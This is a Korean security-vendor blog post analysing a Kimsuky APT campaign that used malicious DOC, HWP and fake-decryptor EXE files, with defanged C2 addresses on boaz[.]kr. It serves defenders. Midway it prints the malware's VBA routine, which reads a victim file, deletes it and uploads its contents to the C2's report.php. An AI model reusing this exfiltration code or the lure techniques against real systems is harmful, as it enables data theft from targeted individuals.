포스팅 내용

악성코드 분석 리포트

김수키(Kimsuky) 그룹, HWP, DOC, EXE 복합적 APT 공격 작전



안녕하세요? 이스트시큐리티 ESRC(시큐리티대응센터)입니다.


특정 정부와 연계된 것으로 알려진 김수키(Kimsuky) 조직의 새로운 '스모크 스크린(Smoke Screen)' APT 캠페인 공격이 등장했습니다.


이들 조직은 최근 마이크로소프트사의 doc 문서파일 형식으로 주로 공격을 수행했는데, 예전처럼 한컴사의 hwp 문서 형식과 exe 실행 파일까지 복합적으로 사용하고 있는 것이 확인 되었습니다.


공격자들은 스피어 피싱(Spear Phishing) 대상에 따라 공격형식을 다중으로 사용하는 위협전술을 수행하고 있습니다.


또한, 문서파일 형식이 아닌 보안 프로그램처럼 위장한 exe 실행파일을 그대로 사용하기도 합니다.



1. doc 문서 포맷을 이용한 공격 사례 분석



[그림 1] DOC 문서를 이용한 공격 사례



DOC 악성문서는 처음 실행 시 PROTECTED DOCUMENT 내용을 보여주면서, 마치 문서의 보안기능 때문에 본문이 보여지지 않는 것처럼 속입니다. 그리고 [콘텐츠 사용]버튼을 클릭하여 악성 매크로 코드가 작동하도록 유인하게 됩니다.


이때 사용된 매크로 유도 표지 디자인은 다양하게 발견이 되고 있는데, ESRC는 2018년 다른 악성문서(42867ae8cf56e803fed5682134d18f90)에 보고된 바 있는 것을 김수키 조직이 유사하게 모방해 사용하고 있는 것을 확인 했습니다.


그리고 지난 05월 29일 공개된 '북한 내 코로나19 상황 인터뷰' 문건으로 사칭한 김수키 APT 공격 주의! 내용에서도 동일한 것이 사용되었습니다. 이외에도 다양한 종류가 발견되고 있습니다.


한편, 만약 이용자가 보안 경고를 무시하고, [콘텐츠 사용] 버튼을 클릭할 경우 악성 코드가 실행됩니다.


그리고 정상적인 본문 내용을 보여주어 정상적인 문서로 오인하도록 만듭니다.


해당 문서의 만든이에는 'Robot Karll' 이름이 포함되어 있는데, 이 계정은 김수키 조직이 사용한 다수의 침해사건에서 목격되고 있습니다.



 [그림 2] Robot Karll 만든이 속성 화면



악성 문서파일의 내부에는 다음과 같은 VBA 코드가 포함되어 있습니다.



[그림 3] VBA 매크로 코드 화면



HEX 스트링으로 선언된 데이터를 ASCII 코드로 변환하면 다음과 같이 한국소재의 특정 명령제어(C2) 서버로 통신을 하도록 작업 스케줄러에 'OneDrive' 이름으로 3분마다 무기한으로 반복하는 트리거를 등록하게 됩니다.


이 공격 시퀀스는 이미 '북한 내 코로나19 상황 인터뷰' 문건으로 사칭한 김수키 조직 공격과 100% 일치합니다.


 

 C2

http://www.boaz[.]kr/skin/member/log/pre.hta

 

http://www.boaz[.]kr/skin/member/log/cross.php?op=1

 

http://www.boaz[.]kr/skin/member/log/report.php 

 

http://www.boaz[.]kr/skin/member/log/suf.hta

 

http://www.boaz[.]kr/skin/member/log/cross.php?op=3



2. hwp 문서 포맷을 이용한 공격 분석 사례



2020년 06월 02일에는 hwp 문서 포맷을 이용한 김수키 조직의 악성 파일이 발견되었습니다.


해당 문서는 마지막 저장시간 기준으로 05월 04일 제작된 것으로 확인되었으며, 파일명은 '드론(무인항공기) 현황 및 개선방안.hwp' 입니다.


공격자는 드론 현황 및 개선방안 주제용자를 유혹하였습니다.


hwp 문서 내부에는 포스트 스크립트(Post Script) 코드를 포함하고 있으며, 인코딩된 쉘코드를 호출하게 됩니다.



[그림 4] 포스트 스크립트 화면



포스트 스크립트에 포함된 쉘코드는 디코딩 루틴을 통해 다음과 같은 명령제어(C2) 서버로 통신을 시도할 수 있도록 작업 스케줄러를 생성합니다.



[그림 4-1] 디코딩 화면



그리고 다음과 같은 정상적인 hwp 문서 본문을 보여주며, 이용자가 의심하지 않도록 만듭니다.



[그림 5] 드론(무인항공기) 현황 및 개선방안 내용으로 위장한 악성문서 화면



doc 문서 때와 마찬가지로 이번에도 은밀히 등록되는 작업 스케줄러 이름은 'OneDrive' 이며, 유사 공격에서도 꾸준히 발견되고 있습니다.



[그림 6] OneDrive 이름으로 등록된 작업스케줄러 화면



명령제어(C2) 서버가 한국의 'boaz[.]kr' 도메인이며, doc 때와 hwp 때가 정확히 동일하며, 이 방식은 김수키 조직의 대표적인 위협 캠페인 중 하나인 '스모크 스크린(Smoke Screen)' 방식입니다.



Sub Report(tar)

bnd = "----1f341c23b5204"

disp = "--" + bnd + vbCrLf + "Content-Disposition: form-data; name="

sz = "MAX_FILE_SIZE"

pd = disp + """" + sz + """" + vbCrLf + vbCrLf

pd = pd + "1000000" + vbCrLf 

f = "file"

fn = "1.txt"

pd = pd + disp + """" + f + """"

pd = pd + "; filename="

set fp = obt(1).opentextfile(tar, 1, false, -2)

readData = fp.readall

fp.close

Roller("cmd /c del " & tar)

pd = pd + """" + fn + """" + vbCrLf

pd = pd + "Content-Type: text/plain" + vbCrLf + vbCrLf

pd = pd + readData + vbCrLf + "--" + bnd + "--"

with obt(2)

.open "POST", mas & "report.php", False

.setRequestHeader "Content-Type", "multipart/form-data; boundary=----1f341c23b5204"

.send pd

end with

Set obt(2) = Nothing

End Sub 



[그림 7] 스모크 스크린 공격에 사용된 공격 기법





3. exe 실행 파일을 이용한 공격 분석 사례



공격자는 doc, hwp 문서를 이용한 APT 공격 뿐만 아니라, exe 실행파일을 이용한 공격도 함께 사용합니다. 


지난 04월 경에 제작된 악성 파일은 마치 AES256 복호화 프로그램처럼 위장해 공격에 사용되었습니다.


파일명은 'AES256 Decryptor.exe' 이며, 아이콘 리소스는 한국어로 제작되어 있습니다.



[그림 8] 한국어(Korean)로 설정된 아이콘 리소스 화면



악성 파일은 암호화된 파일을 복호화하는 기능을 가지고 있으며, 악의적인 기능을 같이 수행하게 됩니다.


실행되면 다음과 같이 실제 복호화 기능 화면을 보여주고, 복호화 대상 파일 선택을 대기합니다.



[그림 9] 복호화 프로그램 위장된 화면



공격자는 'CIA Final Answer-Attachment.docx.enc' 암호화된 파일을 공격 대상자에게 같이 보내어 파일을 복호화 하도록 유도합니다.


실제로 복호화가 진행되면 일부 헤더가 손상된 상태이지만 복구를 시도하면 실제 화면이 나타납니다.



[그림 10] 복호화 후 손상된 파일이 복구된 후 보여지는 화면



그런데 이 문서 파일의 속성을 보면, doc 문서 때와 동일한 'Robot Karll' 계정이 동일하게 발견됩니다. 따라서 doc, hwp, exe 공격이 모두 동일한 속성으로 연결된다는 것을 확인할 수 있습니다.



[그림 11] 복구된 정상 문서의 속성 정보



그리고 복구 프로그램처럼 위장한 이 악성 파일도 다음과 같이 동일한 'boaz[.]kr' C2로 접속을 시도합니다.



 C2 

 http://www.boaz[.]kr/skin/member/basic/css/cross.php?op=1

 

 http://www.boaz[.]kr/skin/member/basic/css/report.php



doc, hwp, exe 파일들별 접속하는 주소를 비교해 보면 다음과 같습니다.



 doc

 http://www.boaz[.]kr/skin/member/log/cross.php?op=1

 Robot Karll

 hwp

 http://www.boaz[.]kr/skin/member/log/cross.php?op=1

 BSH

 exe

 http://www.boaz[.]kr/skin/member/basic/css/cross.php?op=1

 Robot Karll



ESRC에서는 이외에도 다양한 사례의 김수키(Kimsuky) 그룹의 APT 공격을 발견하여 대응하고 있는데, 이들 조직은 최근 한국 방위산업체에 대한 공격과 외교 및 안보분야, 대북단체에 속한 주요 인사들을 집중적으로 공격하고 있습니다.


보다 상세한 침해지표(IoC) 및 위협 인텔리전스 리포트는 '쓰렛인사이드(Threat Inside)' 서비스를 통해 지속적으로 제공할 예정입니다.


특정 정부가 연계된 APT 조직들에 대한 위협이 증가하고 있는 지금, 보다 체계화된 분석 및 대응이 요구되며, 국가사이버안보 차원의 노력과 투자가 중요한 시점입니다.


관련 분야 종사자분들 중 혹시라도 의심스러운 이메일을 발견하면 이스트시큐리티 ESRC(esrc@estsecurity.com)으로 언제든지 연락해 주시기 바랍니다.





  1. 휘게라이프 Gwho 2020.06.04 14:27 신고  수정/삭제  댓글쓰기

    꼼꼼하고 정성적인 글이네요 .. ^^
    감사합니다 .. 잘 보고 갈게요~ ㅎㅎ
    오늘 점심먹으러 나가보니 ..
    점점 더워지는 날씨더라구요~
    건강 조심해세요 !! =)

티스토리 방명록 작성
name password homepage